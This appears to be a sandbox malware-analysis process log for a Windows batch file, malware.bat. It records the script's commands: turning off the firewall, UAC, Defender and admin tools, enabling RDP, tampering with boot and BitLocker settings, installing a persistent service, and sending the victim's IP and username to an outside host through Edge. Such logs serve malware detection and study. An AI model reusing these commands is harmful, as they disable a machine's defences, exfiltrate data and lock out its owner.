C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.1072⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d31647183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,4649512079155860885,8635176623924558900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d31647183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=bvrkipts\admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d31647183⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C:2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d31647183⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ExecutionPolicy Restricted -Scope CurrentUser -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey" 2>nul | findstr "RecoveryKey"2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE" /v "RecoveryKey"3⤵
-
C:\Windows\system32\findstr.exefindstr "RecoveryKey"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d31646f8,0x7ff9d3164708,0x7ff9d31647183⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 300 /nobreak2⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"2⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
